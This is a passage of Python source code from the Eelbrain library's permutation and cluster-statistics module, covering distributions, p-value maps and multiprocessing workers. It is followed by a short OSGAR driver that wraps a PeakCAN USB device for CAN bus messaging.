self.do_permutation = True
else:
self.dist_array = None
self.finalize()
def _create_dist(self):
"Create the distribution container"
if CONFIG['n_workers']:
n = reduce(operator.mul, self.dist_shape)
dist_array = RawArray('d', n)
dist = np.frombuffer(dist_array, np.float64, n)
dist.shape = self.dist_shape
else:
dist_array = None
dist = np.zeros(self.dist_shape)
self.dist_array = dist_array
self.dist = dist
def _aggregate_dist(self, **sub):
"""Aggregate permutation distribution to one value per permutation
Parameters
----------
[dimname] : index
Limit the data for the distribution.
Returns
-------
dist : array, shape = (samples,)
Maximum value for each permutation in the given region.
"""
dist = self.dist
if sub:
if self._dist_dims is None:
raise TypeError("NDPermutationDistribution does not have parcellation")
dist_ = NDVar(dist, self._dist_dims)
dist_sub = dist_.sub(**sub)
dist = dist_sub.x
if dist.ndim > 1:
axes = tuple(range(1, dist.ndim))
dist = dist.max(axes)
return dist
def __repr__(self):
items = []
if self.has_original:
dt = timedelta(seconds=round(self.dt_original))
items.append("%i clusters (%s)" % (self.n_clusters, dt))
if self.samples > 0 and self.n_clusters > 0:
if self.dt_perm is not None:
dt = timedelta(seconds=round(self.dt_perm))
items.append("%i permutations (%s)" % (self.samples, dt))
else:
items.append("no data")
return "<NDPermutationDistribution: %s>" % ', '.join(items)
def __getstate__(self):
if not self._finalized:
raise RuntimeError("Cannot pickle cluster distribution before all "
"permutations have been added.")
state = {
name: getattr(self, name) for name in (
'name', 'meas', '_version', '_host', '_init_time',
# settings ...
'kind', 'threshold', 'tfce', 'tail', 'criteria', 'samples', 'tstart', 'tstop', 'parc',
# data properties ...
'dims', 'shape', '_nad_ax', '_vector_ax', '_criteria', '_connectivity',
# results ...
'dt_original', 'dt_perm', 'n_clusters', '_dist_dims', 'dist', '_original_param_map', '_original_cluster_map', '_cids',
)}
state['version'] = 3
return state
def __setstate__(self, state):
# backwards compatibility
version = state.pop('version', 0)
if version == 0:
if '_connectivity_src' in state:
del state['_connectivity_src']
del state['_connectivity_dst']
if '_connectivity' in state:
del state['_connectivity']
if 'N' in state:
state['samples'] = state.pop('N')
if '_version' not in state:
state['_version'] = '< 0.11'
if '_host' not in state:
state['_host'] = 'unknown'
if '_init_time' not in state:
state['_init_time'] = None
if 'parc' not in state:
if state['_dist_dims'] is None:
state['parc'] = None
else:
raise OldVersionError("This pickled file is from a previous version of Eelbrain and is not compatible anymore. Please recompute this test.")
elif isinstance(state['parc'], tuple):
if len(state['parc']) == 0:
state['parc'] = None
elif len(state['parc']) == 1:
state['parc'] = state['parc'][0]
else:
raise OldVersionError("This pickled file is from a previous version of Eelbrain and is not compatible anymore. Please recompute this test.")
nad_ax = state['_nad_ax']
state['dims'] = dims = state['dims'][1:]
state['_connectivity'] = Connectivity(
(dims[nad_ax],) + dims[:nad_ax] + dims[nad_ax + 1:],
state['parc'])
if version < 2:
state['_vector_ax'] = None
if version < 3:
state['tfce'] = state['kind'] == 'tfce'
for k, v in state.items():
setattr(self, k, v)
self.has_original = True
self.finalize()
def _repr_test_args(self, pmin):
"Argument representation for TestResult repr"
args = ['samples=%r' % self.samples]
if pmin is not None:
args.append(f"pmin={pmin!r}")
elif self.kind == 'tfce':
arg = f"tfce={self.tfce!r}"
if self.tfce_warning:
arg = f"{arg} [WARNING: The TFCE step is larger than the largest value in the data]"
args.append(arg)
if self.tstart is not None:
args.append(f"tstart={self.tstart!r}")
if self.tstop is not None:
args.append(f"tstop={self.tstop!r}")
for k, v in self.criteria.items():
args.append(f"{k}={v!r}")
return args
def _repr_clusters(self):
info = []
if self.kind == 'cluster':
if self.n_clusters == 0:
info.append("no clusters")
else:
info.append("%i clusters" % self.n_clusters)
if self.n_clusters and self.samples:
info.append(f"{fmtxt.peq(self.probability_map.min())}")
return info
def _package_ndvar(self, x, info=None, external_shape=False):
"Generate NDVar from map with internal shape"
if not self.dims:
if isinstance(x, np.ndarray):
return x.item()
return x
if not external_shape and self._nad_ax:
x = x.swapaxes(0, self._nad_ax)
if info is None:
info = {}
return NDVar(x, self.dims, info, self.name)
def finalize(self):
"Package results and delete temporary data"
if self.dt_perm is None:
self.dt_perm = current_time() - self._t0
# original parameter map
param_contours = {}
if self.kind == 'cluster':
if self.tail >= 0:
param_contours[self.threshold] = (0.7, 0.7, 0)
if self.tail <= 0:
param_contours[-self.threshold] = (0.7, 0, 0.7)
info = _info.for_stat_map(self.meas, contours=param_contours)
self.parameter_map = self._package_ndvar(self._original_param_map, info)
# TFCE map
if self.kind == 'tfce':
self.tfce_map = self._package_ndvar(self._original_cluster_map)
else:
self.tfce_map = None
# cluster map
if self.kind == 'cluster':
self.cluster_map = self._package_ndvar(self._original_cluster_map)
else:
self.cluster_map = None
self._finalized = True
def data_for_permutation(self, raw=True):
"""Retrieve data flattened for permutation
Parameters
----------
raw : bool
Return a RawArray and a shape tuple instead of a numpy array.
"""
# get data in the right shape
x = self.y_perm.x
if self._vector_ax:
x = np.moveaxis(x, self._vector_ax + 1, 1)
if self._nad_ax is not None:
dst = 1
src = 1 + self._nad_ax
if self._vector_ax is not None:
dst += 1
if self._vector_ax > self._nad_ax:
src += 1
if dst != src:
x = x.swapaxes(dst, src)
# flat y shape
ndims = 1 + (self._vector_ax is not None)
n_flat = 1 if x.ndim == ndims else reduce(operator.mul, x.shape[ndims:])
y_flat_shape = x.shape[:ndims] + (n_flat,)
if not raw:
return x.reshape(y_flat_shape)
n = reduce(operator.mul, y_flat_shape)
ra = RawArray('d', n)
ra[:] = x.ravel() # OPT: don't copy data
return ra, y_flat_shape, x.shape[ndims:]
def _cluster_properties(self, cluster_map, cids):
"""Create a Dataset with cluster properties
Parameters
----------
cluster_map : NDVar
NDVar in which clusters are marked by bearing the same number.
cids : array_like of int
Numbers specifying the clusters (must occur in cluster_map) which
should be analyzed.
Returns
-------
cluster_properties : Dataset
Cluster properties. Which properties are included depends on the
dimensions.
"""
ndim = cluster_map.ndim
n_clusters = len(cids)
# setup compression
compression = []
for ax, dim in enumerate(cluster_map.dims):
extents = np.empty((n_clusters, len(dim)), dtype=np.bool_)
axes = tuple(i for i in range(ndim) if i != ax)
compression.append((ax, dim, axes, extents))
# find extents for all clusters
c_mask = np.empty(cluster_map.shape, np.bool_)
for i, cid in enumerate(cids):
np.equal(cluster_map, cid, c_mask)
for ax, dim, axes, extents in compression:
np.any(c_mask, axes, extents[i])
# prepare Dataset
ds = Dataset()
ds['id'] = Var(cids)
for ax, dim, axes, extents in compression:
properties = dim._cluster_properties(extents)
if properties is not None:
ds.update(properties)
return ds
def cluster(self, cluster_id):
"""Retrieve a specific cluster as NDVar
Parameters
----------
cluster_id : int
Cluster id.
Returns
-------
cluster : NDVar
NDVar of the cluster, 0 outside the cluster.
Notes
-----
Clusters only have stable ids for thresholded cluster distributions.
"""
if self.kind != 'cluster':
raise RuntimeError(
f'Only cluster-based tests have clusters with stable ids, this '
f'is a {self.kind} distribution. Use the .find_clusters() '
f'method instead with maps=True.')
elif cluster_id not in self._cids:
raise ValueError(f'No cluster with id {cluster_id!r}')
out = self.parameter_map * (self.cluster_map == cluster_id)
properties = self._cluster_properties(self.cluster_map, (cluster_id,))
for k in properties:
out.info[k] = properties[0, k]
return out
def clusters(self, pmin=None, maps=True, **sub):
"""Find significant clusters
Parameters
----------
pmin : None | scalar, 1 >= p >= 0
Threshold p-value for clusters (for thresholded cluster tests the
default is 1, for others 0.05).
maps : bool
Include in the output a map of every cluster (can be memory
intensive if there are large statistical maps and/or many
clusters; default True).
[dimname] : index
Limit the data for the distribution.
Returns
-------
ds : Dataset
Dataset with information about the clusters.
"""
if pmin is None:
if self.samples > 0 and self.kind != 'cluster':
pmin = 0.05
elif self.samples == 0:
msg = ("Can not determine p values in distribution without "
"permutations.")
if self.kind == 'cluster':
msg += " Find clusters with pmin=None."
raise RuntimeError(msg)
if sub:
param_map = self.parameter_map.sub(**sub)
else:
param_map = self.parameter_map
if self.kind == 'cluster':
if sub:
cluster_map = self.cluster_map.sub(**sub)
cids = np.setdiff1d(cluster_map.x, [0])
else:
cluster_map = self.cluster_map
cids = np.array(self._cids)
if len(cids):
# measure original clusters
cluster_v = ndimage.sum(param_map.x, cluster_map.x, cids)
# p-values
if self.samples:
# p-values: "the proportion of random partitions that
# resulted in a larger test statistic than the observed
# one" (179)
dist = self._aggregate_dist(**sub)
n_larger = np.sum(dist > np.abs(cluster_v[:, None]), 1)
cluster_p = n_larger / self.samples
# select clusters
if pmin is not None:
idx = cluster_p <= pmin
cids = cids[idx]
cluster_p = cluster_p[idx]
cluster_v = cluster_v[idx]
# p-value corrected across parc
if sub:
dist = self._aggregate_dist()
n_larger = np.sum(dist > np.abs(cluster_v[:, None]), 1)
cluster_p_corr = n_larger / self.samples
else:
cluster_v = cluster_p = cluster_p_corr = []
ds = self._cluster_properties(cluster_map, cids)
ds['v'] = Var(cluster_v)
if self.samples:
ds['p'] = Var(cluster_p)
if sub:
ds['p_parc'] = Var(cluster_p_corr)
threshold = self.threshold
else:
p_map = self.compute_probability_map(**sub)
bin_map = np.less_equal(p_map.x, pmin)
# threshold for maps
if maps:
values = np.abs(param_map.x)[bin_map]
if len(values):
threshold = values.min() / 2
else:
threshold = 1.
# find clusters (reshape to internal shape for labelling)
if self._nad_ax:
bin_map = bin_map.swapaxes(0, self._nad_ax)
if sub:
raise NotImplementedError("sub")
# need to subset connectivity!
c_map, cids = label_clusters_binary(bin_map, self._connectivity)
if self._nad_ax:
c_map = c_map.swapaxes(0, self._nad_ax)
# Dataset with cluster info
cluster_map = NDVar(c_map, p_map.dims, {}, "clusters")
ds = self._cluster_properties(cluster_map, cids)
ds.info['clusters'] = cluster_map
min_pos = ndimage.minimum_position(p_map.x, c_map, cids)
ds['p'] = Var([p_map.x[pos] for pos in min_pos])
if 'p' in ds:
ds['sig'] = star_factor(ds['p'])
# expand clusters
if maps:
shape = (ds.n_cases,) + param_map.shape
c_maps = np.empty(shape, dtype=param_map.x.dtype)
c_mask = np.empty(param_map.shape, dtype=np.bool_)
for i, cid in enumerate(cids):
np.equal(cluster_map.x, cid, c_mask)
np.multiply(param_map.x, c_mask, c_maps[i])
# package ndvar
dims = ('case',) + param_map.dims
param_contours = {}
if self.tail >= 0:
param_contours[threshold] = (0.7, 0.7, 0)
if self.tail <= 0:
param_contours[-threshold] = (0.7, 0, 0.7)
info = _info.for_stat_map(self.meas, contours=param_contours)
info['summary_func'] = np.sum
ds['cluster'] = NDVar(c_maps, dims, info)
else:
ds.info['clusters'] = self.cluster_map
return ds
def find_peaks(self):
"""Find peaks in a TFCE distribution
Returns
-------
ds : Dataset
Dataset with information about the peaks.
"""
if self.kind == 'cluster':
raise RuntimeError("Not a threshold-free distribution")
param_map = self._original_param_map
probability_map = self.probability_map.x
if self._nad_ax:
probability_map = probability_map.swapaxes(0, self._nad_ax)
peaks = find_peaks(self._original_cluster_map, self._connectivity)
peak_map, peak_ids = label_clusters_binary(peaks, self._connectivity)
ds = Dataset()
ds['id'] = Var(peak_ids)
v = ds.add_empty_var('v')
if self.samples:
p = ds.add_empty_var('p')
bin_buff = np.empty(peak_map.shape, np.bool_)
for i, id_ in enumerate(peak_ids):
idx = np.equal(peak_map, id_, bin_buff)
v[i] = param_map[idx][0]
if self.samples:
p[i] = probability_map[idx][0]
return ds
def compute_probability_map(self, **sub):
"""Compute a probability map
Parameters
----------
[dimname] : index
Limit the data for the distribution.
Returns
-------
probability : NDVar
Map of p-values.
"""
if not self.samples:
raise RuntimeError("Can't compute probability without permutations")
if self.kind == 'cluster':
cpmap = np.ones(self.shape)
if self.n_clusters:
cids = self._cids
dist = self._aggregate_dist(**sub)
cluster_map = self._original_cluster_map
param_map = self._original_param_map
# measure clusters
cluster_v = ndimage.sum(param_map, cluster_map, cids)
# p-values: "the proportion of random partitions that resulted
# in a larger test statistic than the observed one" (179)
n_larger = np.sum(dist >= np.abs(cluster_v[:, None]), 1)
cluster_p = n_larger / self.samples
c_mask = np.empty(self.shape, dtype=np.bool_)
for i, cid in enumerate(cids):
np.equal(cluster_map, cid, c_mask)
cpmap[c_mask] = cluster_p[i]
# revert to original shape
if self._nad_ax:
cpmap = cpmap.swapaxes(0, self._nad_ax)
dims = self.dims
else:
if self.kind == 'tfce':
stat_map = self.tfce_map
else:
if self.tail == 0:
stat_map = self.parameter_map.abs()
elif self.tail < 0:
stat_map = -self.parameter_map
else:
stat_map = self.parameter_map
if sub:
stat_map = stat_map.sub(**sub)
dims = stat_map.dims if isinstance(stat_map, NDVar) else None
cpmap = np.zeros(stat_map.shape) if dims else 0.
if self.dist is None: # flat stat-map
cpmap += 1
else:
dist = self._aggregate_dist(**sub)
idx = np.empty(stat_map.shape, dtype=np.bool_)
actual = stat_map.x if self.dims else stat_map
for v in dist:
cpmap += np.greater_equal(v, actual, idx)
cpmap /= self.samples
if dims:
return NDVar(cpmap, dims, _info.for_cluster_pmap(), self.name)
else:
return cpmap
def masked_parameter_map(self, pmin=0.05, name=None, **sub):
"""Parameter map masked by significance
Parameters
----------
pmin : scalar
Threshold p-value for masking (default 0.05). For threshold-based
cluster tests, ``pmin=1`` includes all clusters regardless of their
p-value.
Returns
-------
masked_map : NDVar
NDVar with data from the original parameter map, masked with
p <= pmin.
"""
if not 1 >= pmin > 0:
raise ValueError(f"pmin={pmin}: needs to be between 1 and 0")
if name is None:
name = self.parameter_map.name
if sub:
param_map = self.parameter_map.sub(**sub)
else:
param_map = self.parameter_map
if pmin == 1:
if self.kind != 'cluster':
raise ValueError(f"pmin=1 is only a valid mask for threshold-based cluster tests")
mask = self.cluster_map == 0
else:
probability_map = self.compute_probability_map(**sub)
mask = probability_map > pmin
return param_map.mask(mask, name)
@LazyProperty
def probability_map(self):
if self.samples:
return self.compute_probability_map()
else:
return None
@LazyProperty
def _default_plot_obj(self):
if self.samples:
return [[self.parameter_map, self.probability_map]]
else:
return [[self.parameter_map]]
def info_list(self, title="Computation Info"):
"List with information on computation"
l = fmtxt.List(title)
l.add_item("Eelbrain version: %s" % self._version)
l.add_item("Host Computer: %s" % self._host)
if self._init_time is not None:
l.add_item("Created: %s" % datetime.fromtimestamp(self._init_time)
.strftime('%y-%m-%d %H:%M'))
l.add_item("Original time: %s" % timedelta(seconds=round(self.dt_original)))
l.add_item("Permutation time: %s" % timedelta(seconds=round(self.dt_perm)))
return l
class _MergedTemporalClusterDist:
"""Merge permutation distributions from multiple tests"""
def __init__(self, cdists):
if isinstance(cdists[0], list):
self.effects = [d.name for d in cdists[0]]
self.samples = cdists[0][0].samples
dist = {}
for i, effect in enumerate(self.effects):
if any(d[i].n_clusters for d in cdists):
dist[effect] = np.column_stack([d[i].dist for d in cdists if d[i].dist is not None])
if len(dist):
dist = {c: d.max(1) for c, d in dist.items()}
else:
self.samples = cdists[0].samples
if any(d.n_clusters for d in cdists):
dist = np.column_stack([d.dist for d in cdists if d.dist is not None])
dist = dist.max(1)
else:
dist = None
self.dist = dist
def correct_cluster_p(self, res):
clusters = res.find_clusters()
keys = list(clusters.keys())
if not clusters.n_cases:
return clusters
if isinstance(res, MultiEffectNDTest):
keys.insert(-1, 'p_parc')
cluster_p_corr = []
for cl in clusters.itercases():
n_larger = np.sum(self.dist[cl['effect']] > np.abs(cl['v']))
cluster_p_corr.append(float(n_larger) / self.samples)
else:
keys.append('p_parc')
vs = np.array(clusters['v'])
n_larger = np.sum(self.dist > np.abs(vs[:, None]), 1)
cluster_p_corr = n_larger / self.samples
clusters['p_parc'] = Var(cluster_p_corr)
clusters = clusters[keys]
return clusters
def distribution_worker(dist_array, dist_shape, in_queue, kill_beacon):
"Worker that accumulates values and places them into the distribution"
n = reduce(operator.mul, dist_shape)
dist = np.frombuffer(dist_array, np.float64, n)
dist.shape = dist_shape
samples = dist_shape[0]
for i in trange(samples, desc="Permutation test", unit=' permutations',
disable=CONFIG['tqdm']):
dist[i] = in_queue.get()
if kill_beacon.is_set():
return
def permutation_worker(in_queue, out_queue, y, y_flat_shape, stat_map_shape,
test_func, args, map_args, kill_beacon):
"Worker for 1 sample t-test"
if CONFIG['nice']:
os.nice(CONFIG['nice'])
n = reduce(operator.mul, y_flat_shape)
y = np.frombuffer(y, np.float64, n).reshape(y_flat_shape)
stat_map = np.empty(stat_map_shape)
stat_map_flat = stat_map.ravel()
map_processor = get_map_processor(*map_args)
while not kill_beacon.is_set():
perm = in_queue.get()
if perm is None:
break
test_func(y, *args, stat_map_flat, perm)
max_v = map_processor.max_stat(stat_map)
out_queue.put(max_v)
def run_permutation(test_func, dist, iterator, *args):
if CONFIG['n_workers']:
workers, out_queue, kill_beacon = setup_workers(test_func, dist, args)
try:
for perm in iterator:
out_queue.put(perm)
for _ in range(len(workers) - 1):
out_queue.put(None)
logger = logging.getLogger(__name__)
for w in workers:
w.join()
logger.debug("worker joined")
except KeyboardInterrupt:
kill_beacon.set()
raise
else:
y = dist.data_for_permutation(False)
map_processor = get_map_processor(*dist.map_args)
stat_map = np.empty(dist.shape)
stat_map_flat = stat_map.ravel()
for i, perm in enumerate(iterator):
test_func(y, *args, stat_map_flat, perm)
dist.dist[i] = map_processor.max_stat(stat_map)
dist.finalize()
def setup_workers(test_func, dist, func_args):
"Initialize workers for permutation tests"
logger = logging.getLogger(__name__)
logger.debug("Setting up %i worker processes..." % CONFIG['n_workers'])
permutation_queue = SimpleQueue()
dist_queue = SimpleQueue()
kill_beacon = Event()
restore_main_spec()
# permutation workers
y, y_flat_shape, stat_map_shape = dist.data_for_permutation()
args = (permutation_queue, dist_queue, y, y_flat_shape, stat_map_shape,
test_func, func_args, dist.map_args, kill_beacon)
workers = []
for _ in range(CONFIG['n_workers']):
w = Process(target=permutation_worker, args=args)
w.start()
workers.append(w)
# distribution worker
args = (dist.dist_array, dist.dist_shape, dist_queue, kill_beacon)
w = Process(target=distribution_worker, args=args)
w.start()
workers.append(w)
return workers, permutation_queue, kill_beacon
def run_permutation_me(test, dists, iterator):
dist = dists[0]
if dist.kind == 'cluster':
thresholds = tuple(d.threshold for d in dists)
else:
thresholds = None
if CONFIG['n_workers']:
workers, out_queue, kill_beacon = setup_workers_me(test, dists, thresholds)
try:
for perm in iterator:
out_queue.put(perm)
for _ in range(len(workers) - 1):
out_queue.put(None)
logger = logging.getLogger(__name__)
for w in workers:
w.join()
logger.debug("worker joined")
except KeyboardInterrupt:
kill_beacon.set()
raise
else:
y = dist.data_for_permutation(False)
map_processor = get_map_processor(*dist.map_args)
stat_maps = test.preallocate(dist.shape)
if thresholds:
stat_maps_iter = tuple(zip(stat_maps, thresholds, dists))
else:
stat_maps_iter = tuple(zip(stat_maps, dists))
for i, perm in enumerate(iterator):
test.map(y, perm)
if thresholds:
for m, t, d in stat_maps_iter:
if d.do_permutation:
d.dist[i] = map_processor.max_stat(m, t)
else:
for m, d in stat_maps_iter:
if d.do_permutation:
d.dist[i] = map_processor.max_stat(m)
for d in dists:
if d.do_permutation:
d.finalize()
def setup_workers_me(test_func, dists, thresholds):
"Initialize workers for permutation tests"
logger = logging.getLogger(__name__)
logger.debug("Setting up %i worker processes..." % CONFIG['n_workers'])
permutation_queue = SimpleQueue()
dist_queue = SimpleQueue()
kill_beacon = Event()
restore_main_spec()
# permutation workers
dist = dists[0]
y, y_flat_shape, stat_map_shape = dist.data_for_permutation()
args = (permutation_queue, dist_queue, y, y_flat_shape, stat_map_shape,
test_func, dist.map_args, thresholds, kill_beacon)
workers = []
for _ in range(CONFIG['n_workers']):
w = Process(target=permutation_worker_me, args=args)
w.start()
workers.append(w)
# distribution worker
args = ([d.dist_array for d in dists], dist.dist_shape, dist_queue, kill_beacon)
w = Process(target=distribution_worker_me, args=args)
w.start()
workers.append(w)
return workers, permutation_queue, kill_beacon
def permutation_worker_me(in_queue, out_queue, y, y_flat_shape, stat_map_shape,
test, map_args, thresholds, kill_beacon):
if CONFIG['nice']:
os.nice(CONFIG['nice'])
n = reduce(operator.mul, y_flat_shape)
y = np.frombuffer(y, np.float64, n).reshape(y_flat_shape)
iterator = test.preallocate(stat_map_shape)
if thresholds:
iterator = tuple(zip(iterator, thresholds))
else:
iterator = tuple(iterator)
map_processor = get_map_processor(*map_args)
while not kill_beacon.is_set():
perm = in_queue.get()
if perm is None:
break
test.map(y, perm)
if thresholds:
max_v = [map_processor.max_stat(m, t) for m, t in iterator]
else:
max_v = [map_processor.max_stat(m) for m in iterator]
out_queue.put(max_v)
def distribution_worker_me(dist_arrays, dist_shape, in_queue, kill_beacon):
"Worker that accumulates values and places them into the distribution"
n = reduce(operator.mul, dist_shape)
dists = [d if d is None else np.frombuffer(d, np.float64, n).reshape(dist_shape)
for d in dist_arrays]
samples = dist_shape[0]
for i in trange(samples, desc="Permutation test", unit=' permutations',
disable=CONFIG['tqdm']):
for dist, v in zip(dists, in_queue.get()):
if dist is not None:
dist[i] = v
if kill_beacon.is_set():
return
# Backwards compatibility for pickling
_ClusterDist = NDPermutationDistribution
|
pcan.py
|
"""
Wrapper for PeakCAN USB device
"""
#
# pip install python-can
# https://python-can.readthedocs.io/en/2.1.0/interfaces/pcan.html
#
# https://www.peak-system.com/
# https://www.peak-system.com/fileadmin/media/files/pcan-basic.zip
# http://www.peak-system.com/quick/BasicLinux
#
# https://en.wikipedia.org/wiki/CAN_bus
#
# CAN messages published and consumed by this driver contain arbitration_id, data and flags
# http://docs.ros.org/melodic/api/can_msgs/html/msg/Frame.html
#
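# Hedged example of the message <-> list mapping used by this driver
# (IDs and payload values are illustrative):
#
#   msg = can.Message(arbitration_id=0x11, data=[0x01, 0x02], is_extended_id=False)
#   packet = [msg.arbitration_id, msg.data, 0]   # flags bit 0 = extended ID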
import can
from threading import Thread
from osgar.bus import BusShutdownException
IS_EXTENDED_ID_MASK = 0x1
class PeakCAN:
def __init__(self, config, bus):
self.bus = bus
bus.register('can')
self.canbus = can.interface.Bus(bustype='pcan', channel='PCAN_USBBUS1', bitrate=500000)
self.input_thread = Thread(target=self.run_input, daemon=True)
self.output_thread = Thread(target=self.run_output, daemon=True)
def start(self):
self.input_thread.start()
self.output_thread.start()
def join(self, timeout=None):
self.input_thread.join(timeout=timeout)
self.output_thread.join(timeout=timeout)
def run_input(self):
while self.bus.is_alive():
msg = self.canbus.recv() # TODO timeout
flags = IS_EXTENDED_ID_MASK if msg.is_extended_id else 0
self.bus.publish('can', [msg.arbitration_id, msg.data, flags])
def slot_raw(self, timestamp, packet):
arbitration_id, data, flags = packet
msg = can.Message(arbitration_id=arbitration_id, data=data, is_extended_id=bool(flags & IS_EXTENDED_ID_MASK))
self.canbus.send(msg) # TODO timeout, locks?!
def run_output(self):
try:
while True:
dt, __, data = self.bus.listen()
self.slot_raw(dt, data)
except BusShutdownException:
pass
def request_stop(self):
self.bus.shutdown()
# vim: expandtab sw=4 ts=4
|